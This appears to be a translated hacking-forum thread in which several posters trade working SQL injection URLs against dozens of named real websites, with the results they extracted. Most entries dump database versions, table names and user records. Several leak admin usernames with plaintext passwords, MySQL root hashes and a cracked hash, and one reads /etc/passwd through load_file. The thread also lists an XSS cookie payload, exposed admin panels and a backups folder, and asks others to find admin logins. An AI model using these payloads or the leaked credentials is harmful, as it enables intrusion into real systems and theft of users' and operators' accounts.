SQLi:
Code:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,3,4--
then we find out the version:
Code:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,version(),4--
table list:
Code:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,table_name,4+from+information_schema.tables--
column list:
Code:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,COLUMN_NAME,4+from+information_schema.columns--
username and password:
Code:
_http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,username,pass+from+users--
HERE: name - admin, password - drserver000
2 satana8920 http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13+LIMIT+1,1-- Database Version: 5.0.67-log Database name: u64588 User name: [email protected] Os : unknown-freebsd6.2 http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3,concat_ws(0x3a,User_id,User_Login_Name,User_Password),5,6,7,8,9,10,11,12,13+FROM+tbl_Users+LIMIT+1,1-- 1:admin:wrucrest 2:tvar:61sz21 3:squo:karina etc..
http://www.vetlabassoc.com/display.php?id=-7+union+select+1,2,3,version(),5/*
4.0.27-log
the output is in the image
http://www.howcheng.com/sillystuff/display.php?id=17/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1/*
Database Version: 4.0.27-max-log
Database name: db96095051
User name: [email protected]
https://www.mls-law.de/shop/index.php?include=11&id=20+union+select+1,concat(id,0x3a,email,0x3a,admin,0x3a,address),3+from+user/*
Database Version: 4.0.27-standard-log
Database name: db224505621
User name: [email protected]
for some reason I've been drawn to German shops =)
1
Code:
http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,2,3,4,5--
2
Code:
http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,version(),3,4,5--
3
Code:
http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,concat_ws(0x20,user,password),3,4,5+from+mysql.user--
root 3c09b7d551df88a5
this is a MySQL hash!
[PR = 6][SQL - 5] Code: http://lifepeeragesact.parliament.uk/lifePeeragesAct/detail.php?id=164+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- [PR = 4][SQL - 5] Code: http://faroutshirts.com/detail.php?id=289+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://www.mega-poker.net/comments.php?id=5+and+1=0+union+select+1,2,concat_ws%280x3a,user_id,0x3a,username,0x3a,user_password%29,4,5,6+from+megaforum.forum_users--
http://speakercitysoftball.com/news.php?type=story&id=-18 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users--
http://www.sugababes.com/news-detail.php?id=-1+union+all+select+username,user_password,3,4+from+phpbb_users+where+user_id=2
http://www.libross.com/pub/contenido.php?ID=-9999+union+all+select+1,2,3,concat(username,char(58),password)+from+users--
=======================
Code:
shttp://www.phpstreet.com/winxp.php?id=-1%20union%20all%20select%201,@@version,3%20--
=====================
http://www.controlledlabs.com/product_desc.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(id,0x3a,username,0x3a,password),18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+admin--
And this is how the backups are stored)
http://www.controlledlabs.com/catalog/admin/backups/
======================
http://www.champion-evreux.fr/produit.php?id=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
http://www.boero-france.com/fr/produit.php?id=-1+union+select+all+1,2,3,4,unhex(hex(concat_ws(0x3a,version(),user(),database()))),6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
=======================
http://www.hostinglook.com/directory.php?ax=list&sub=7&cat_id=directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20links--
http://www.tni.org/detail_pub.phtml?&&&know_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,(SELECT+group_concat(user,0x3a,password,0x3a,userid,0x3a,groupid,0x3a,fullname,0x3a,iv,0x3a,workgroups)+FROM+user),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68--
http://www.fiercekitten.com/blog/news.php?id=196+and+0=1+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6+from+as_users--
http://www.miromar.com/news.php?id=20+and+0=1+union+select+0,group_concat(user_username,0x3a,user_password),2+from+wma_users--
http://www.rockforlife.org/article.php?id=-10253%20union%20select%201,%20group_concat(user,0x3a,pass,0x3a,email,0x3a,status,0x3a,lastlogin),3,4,5,6,7,8,9,10,11,12,13,14+from+login--
http://www.jumbuck.com/support/default.php?productid=19+and+0=1+union+select+0,1,group_concat(vchusername,0x3a,vchpassword),3,4+from+tblAdmin
=========================
Code:
http://www.gamer.tm/news.php?id=-1848+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(blg_username,0x3a,blg_password),14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+staff/*
Code:
http://www.ctpetguide.com/profile.php?id=-8/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,username,passw ord),15,16,17+from+users/*
======================
Code:
http://www.thenakedtruthproject.org/product.details.php?product_id=82+and+1=0+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+mysql.user--

A short play in three acts:
Number one: we switch on a piece of the internet and go to a random site, for example this one:
http://www.hkdailynews.com.hk/
After a little thought, our hands led us to:
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,version(),2,3
We look at the version: and marvel at the thinking of the dejected admin.
Curtain. Intermission.
Number two: the attack begins.
Code:
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,concat(user(),0x2f,database(),0x2f,version()),null,3
Where on stage we see
Then we collect
Code:
cxholidays information_schema mysql news_database test webcal
We pull out:
Code:
admin -- f17b3fd9fac71f025a5787dd6ef1259a (insidepro.com = cxww)
Number three: the attack continues.
In MySQL:
Code:
*EE30ECF7B15114D19DF0460E2573ECC376217E81 / root
news_databeses:
Code:
admin / b0baee9d279d34fa1dfd71aadb908c3f (local database = 11111)
And hop-hop
Code:
http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,load_file(%27/etc/passwd%27),null,3--
Ta-da:
Kids, don't smoke dough, it wants to live too.
==============================
Code:
http://www.atohm.com/kit_rafalev60.php?id_kit=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,concat(login,0x3a,pass),13%20from%20_user--
Code:
http://www.omct.org/index.php?id=&lang=eng&articleSet=Documents&articleId=7253+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20users--
==============================
Code:
http://www.singup.org/songbank/song.php?id=90+union+all+select+group_concat(user_name,0x3a,user_pass,0x3a,user_email),2%20from%20admin_user--
singup_live,songbank_live
songbank_live:
Code:
accompaniment,admin_user,admin_user_group,admin_user_level,album,cc_links confidence,establishment,establishment_favs,event,event_type,keystage,menum usical_element,pagegroup,pages,pdf,related_link,related_song,song,song_accompaniment song_keystage,song_menu,song_musical_element,song_style,song_writer,song_year_group song_yeargroup,songban
admin_user:
Code:
user_id,user_group_id,user_name,user_pass,user_email,user_level_id
singup_live:
Code:
agegroups,altformats,boroughs,cdrom08,comments,contactchannels,dumprecord,emailalerts,emailformat,emailnational,emailtype,employment,ethnicityid,experience,gender,hasdisability,howdidyou,regions,registration,role,sectors,themes,title,workarea
==========================
Code:
http://vladenie.ru/search.php?id=382+and+0+union+select+0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),user,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1&cl=6&fromp=1&subtype=0
root:0e6b82290c5ebcf5
http://www.pshsoft.net/pshsoft/en/product.php?id=10001/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/LIMIT/**/1,1/*
Database Version: 4.0.27-max-log
Database name: db188349573
User name: [email protected]
there is users id: password:username ---> 1:Zy$xAC@;:mamu
whoever finds the admin panel, write me a PM, I can't be bothered to look for it right now
http://www.renome.biz/product.php?id=37&pid=4/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*
Database Version: 4.1.22-standard
Database name: renome_renome
User name: renome_user@localhost
Sushi-town ^^
Code:
http://www.sushi-town.ru/?page=catalog&goods=2+and+1=0+union+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user--&num=0
Database Version: 4.1.22-log http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,concat(user,0x3a,password,0x3a,host),4+from+mysql.user-- http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,login,pass+from+admins-- http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,'<script>alert(document.cookie)</script>',4-- SIXSS
http://pool.veoo.de/bilder/show.php?id=2'+union+select+1--
Database Version: 5.0.32-Debian_7etch8
Database name: DB14850
User name: DB14850@localhost
http://www.psychoambulanz.de/forum_free/show.php?forum=500&id=-230+1,2,3,4,5,6,7,8--
Database Version: 4.0.27-log
Database name: DB30543
User name: [email protected]
http://www.fra35.de/fotoalbum/show.php?id=-822+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Database Version: 5.0.51a-3ubuntu5.4
Database name: fra35db
User name: fra35dbuser@localhost
http://www.absolutemusic.co.uk/shop/index.php?cat_id=497+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Database Version: 4.1.22-standard
Database name: absolute_
User name: absolute@localhost
http://www.berryscrumptious.co.uk/shop/index.php?cat=1+union+select+1--
Database Version: 5.0.67-community
Database name: berryscr_shop
User name: berryscr_shop@localhost
PS a little bit of Germans and English
Code: http://www.henleystandardtoday.co.uk/food/food.php?id=1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10 hsta@localhost:henleystanda:5.0.45
<<All about cinema>>
Code:
http://films.h16.ru/main.php?ttt=-15+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
db: 4.0.27
name_db: films6
user: [email protected]
os ortbld-freebsd6.4
Code:
http://www.russonsrestaurant.co.uk/food.php?&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4
[email protected]:russons:4.1.22-log
And SIPT is a cool thing =)
Code:
http://www.killarney.ie/food.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
Database Version: 5.0.45-community-log
Database name: splashg_konline
User name: [email protected]
Tables:
http://www.klima-ueberraschung.de/show.php?id=14+1,2,3,4,5,6--
Database Version: 4.0.27-standard-log
Database name: db223113601
User name: [email protected]
http://www.klima-ueberraschung.de/admin/
admin panel; whoever finds any tables, please post, ja ja sehr GUT ))
mailbrush, oh yes, and what a cool one it is
Code: http://www.country-tours.com/food.php?ID_CAT=10&ID_SUBCAT=0&ID=24+union+select+1,2,3,4,5,6,7,8 Database Version: 5.0.67 Database name: 202_country-tours User name: 202_cn@localhost Tables:
<<Restaurants, Mexican cuisine>>
Code:
http://spb-tour.com/ViewRestaurant.php?Id=-14'+union+select+1,2,3,4,table_name,6,7+from+information_schema.columns+where+column_name+like+'password'+limit+1,1--+
db: 5.0.45
name_db: galina_spbt
user: galina_spbt@localhost
os: unknown-freebsd6.2
---------------------------------
http://spb-tour.com/robots.txt
Code:
User-Agent:
Disallow: /1/
Disallow: /admin/
Disallow: /html/
Disallow: /Forum.php
---------------------------------
http://spb-tour.com/admin
admin panel with basic authorization
table: users
db: galina_spbt
log: eva
pass: eva
+limit+x,x--+